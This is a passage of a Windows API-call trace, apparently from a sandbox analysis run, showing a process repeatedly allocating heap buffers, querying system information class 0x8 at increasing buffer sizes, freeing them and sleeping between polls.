dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.804] Sleep (dwMilliseconds=0x110) [0177.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.815] Sleep (dwMilliseconds=0x110) [0177.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.864] Sleep (dwMilliseconds=0x110) [0177.902] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.902] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.902] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.908] Sleep (dwMilliseconds=0x110) [0177.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.976] Sleep (dwMilliseconds=0x110) [0178.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.088] Sleep (dwMilliseconds=0x110) [0178.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.114] Sleep (dwMilliseconds=0x110) [0178.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.131] Sleep (dwMilliseconds=0x110) [0178.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.164] Sleep (dwMilliseconds=0x110) [0178.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.241] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.241] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.241] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.242] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.248] Sleep (dwMilliseconds=0x110) [0178.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.518] Sleep (dwMilliseconds=0x110) [0178.588] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.589] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.590] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.598] Sleep (dwMilliseconds=0x110) [0178.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.668] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.675] Sleep (dwMilliseconds=0x110) [0178.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.691] Sleep (dwMilliseconds=0x110) [0178.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 